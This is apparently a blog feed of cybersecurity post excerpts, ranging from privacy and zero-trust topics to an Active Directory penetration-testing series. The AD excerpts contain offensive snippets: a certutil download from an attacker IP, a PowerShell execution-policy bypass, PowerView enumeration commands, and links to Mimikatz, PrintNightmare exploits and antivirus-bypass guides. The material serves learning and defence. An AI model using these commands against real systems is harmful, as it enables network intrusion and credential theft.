https://auti.dev/ Recent content on auti.dev   ≽^._.^≼ ∫ Hugo en-US Copyright © 2023 - 2025, Atharva Auti. Wed, 22 Jan 2025 12:50:00 -0800 https://auti.dev/what-data-is-out-there-uber-lyft/ Wed, 22 Jan 2025 12:50:00 -0800 https://auti.dev/what-data-is-out-there-uber-lyft/ Introduction In an increasingly data-driven world, companies like Uber and Lyft have become essential services, revolutionizing transportation. However, with their global reach and tech-driven platforms, these ride-hailing giants collect and process vast amounts of sensitive personal data from users, drivers, and third parties. In this report, we explore & compare the privacy practices of Uber and Lyft, focusing on the types of data collected, its storage, sharing mechanisms, retention policies, and potential uses. https://auti.dev/hipaa-unveiled/ Wed, 20 Nov 2024 10:50:45 -0800 https://auti.dev/hipaa-unveiled/ The Digital Frontier of Healthcare Privacy Picture this: It’s 3 AM, and somewhere in a healthcare network, millions of sensitive patient records are being transmitted, stored, and protected. Behind this intricate dance of data lies HIPAA - the Health Insurance Portability and Accountability Act - a regulatory powerhouse that has revolutionized healthcare data protection. Why HIPAA Matters in the Age of Cyber Vulnerability? In an era where a single data breach can expose millions of patient records, HIPAA stands as a critical line of defense. https://auti.dev/shepherd/ Tue, 15 Oct 2024 09:00:00 -0800 https://auti.dev/shepherd/ The Inspiration Behind Shepherd Decentralized finance (DeFi) and smart contracts have transformed the financial landscape, offering innovative, permissionless transactions. However, with this innovation comes significant security risks. High-profile exploits, such as the infamous Poly Network hack where attackers stole over $600 million, highlight the weaknesses of current security measures. Most smart contract audits rely on static analysis, which often fails to detect complex vulnerabilities. That’s where Shepherd comes in—a dynamic, affordable security solution that proactively tests smart contracts in real-world conditions, adding a crucial layer of defense. https://auti.dev/zero-trust-architecture/ Sun, 15 Sep 2024 12:00:00 +0530 https://auti.dev/zero-trust-architecture/ First talk on 14th September 2024, at University of Southern California, Los Angeles Presentation: docs.google.com I had the privilege of delivering a talk for DSCI 519 at USC. We introduced the concept of Zero Trust Architecture (ZTA) and its role in building high-assurance systems. This session explored the core principles of ZTA, including identity-centric security, micro-segmentation, and continuous monitoring, demonstrating how these concepts fortify system security and minimize risks. We detailed a systematic approach to developing ZTA, from system inventory and risk mapping to secure communication and incident response automation. https://auti.dev/trusted-computing-base-mindmap/ Tue, 03 Sep 2024 10:00:25 -0800 https://auti.dev/trusted-computing-base-mindmap/ A Trusted Computing Base (TCB) is the totality of the protection mechanisms within a system or architecture that work together to enforce a security policy. Definition Simplified Totality: ALL Protection Mechanisms: Hardware (TPM) Firmware (Code signing) Software (Anti-virus) Figure: Mindmap for TCB A Trusted Computing Base comprises all of the protection mechanisms: People Processes Technology Reference Monitor Concept (RMC) A reference monitor is an access control concept of an abstract machine that mediates all accesses to objects by subjects. https://auti.dev/cloud-security-basics/ Sat, 15 Jun 2024 12:00:00 +0530 https://auti.dev/cloud-security-basics/ First seminar on 24th June 2024, as a seminar at Mumbai University Presentation: docs.google.com I had the honor of delivering a talk at SAKEC, Mumbai University, where I introduced the fundamental concepts of cloud computing. This session delved into the core principles of cloud architecture, service models, and deployment strategies, providing a comprehensive overview of how cloud technology is transforming the IT landscape. Through practical examples and real-world scenarios, I highlighted the benefits of cloud adoption and discussed the key considerations for securing cloud environments. https://auti.dev/gensecops/ Wed, 15 May 2024 12:00:00 -0800 https://auti.dev/gensecops/ Revolutionizing Security Testing with Generative AI in DevSecOps In today’s fast-paced software development environment, integrating security into the lifecycle is no longer optional—it’s a necessity. DevSecOps, which combines software development, security, and IT operations, has emerged as a key methodology to ensure security becomes an integral part of development workflows. Yet, traditional security testing methods remain slow, manual, and often incapable of keeping up with the dynamic pace of modern development. https://auti.dev/mobsecops/ Sat, 20 Apr 2024 09:00:00 -0800 https://auti.dev/mobsecops/ A Comprehensive Android Security Framework In today’s interconnected world, mobile applications are central to our personal and professional lives. However, the rise in mobile app usage is paralleled by increasingly sophisticated cyber threats. Traditional tools, while effective, often fail to keep up with these evolving vulnerabilities. Recognizing this gap, we developed MobSecOps, an advanced Android Security Framework tailored to the OWASP Mobile Top 10 2023 vulnerabilities. It combines static and dynamic analysis with AI-driven insights to deliver a comprehensive security solution. https://auti.dev/demystifying-elastic-siem/ Tue, 17 Oct 2023 12:35:53 +0530 https://auti.dev/demystifying-elastic-siem/ Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers. https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ Tue, 17 Oct 2023 12:35:53 +0530 https://auti.dev/leveraging-cybersecurity-using-elasticsearch/ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs. https://auti.dev/honeytrack/ Sat, 19 Aug 2023 14:28:54 +0530 https://auti.dev/honeytrack/ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently. HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search, Kibana, and Filebeat which protect an organization’s database as well it backtracks the hacker when it intrudes the target network. https://auti.dev/owasp-top-10/ Wed, 15 Feb 2023 12:22:44 +0530 https://auti.dev/owasp-top-10/ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications. https://auti.dev/useful-ad-resources/ Fri, 20 Aug 2021 12:35:53 +0530 https://auti.dev/useful-ad-resources/ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases Mitm6: https://github.com/fox-it/mitm6 Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 Mimikatz: https://github.com/gentilkiwi/mimikatz PRET: https://github.com/RUB-NDS/PRET Praeda: https://github.com/percx/Praeda SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486) LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899)) cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675 calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675 Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/ mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/ Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ https://auti.dev/compromising-ad-part-4-post-exploitation/ Tue, 17 Aug 2021 12:35:53 +0530 https://auti.dev/compromising-ad-part-4-post-exploitation/ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host python -m SimpleHTTPServer [port] Browser Navigate directly to the file (%20 for spaces) FTP On Attacker Machine python -m pyftpdlib 21 On Victim Machine, Browse to https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Mon, 16 Aug 2021 12:35:53 +0530 https://auti.dev/compromising-ad-part-3-post-compromise-attacks/ Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks! https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Sun, 15 Aug 2021 12:37:53 +0530 https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView Enumeration Load up a command prompt and cd into Downloads powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView . .\Powerview.ps1 Fundamental Commands Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy). https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Sun, 15 Aug 2021 12:35:53 +0530 https://auti.dev/compromising-ad-part-1-initial-attack-vectors/ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure. Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.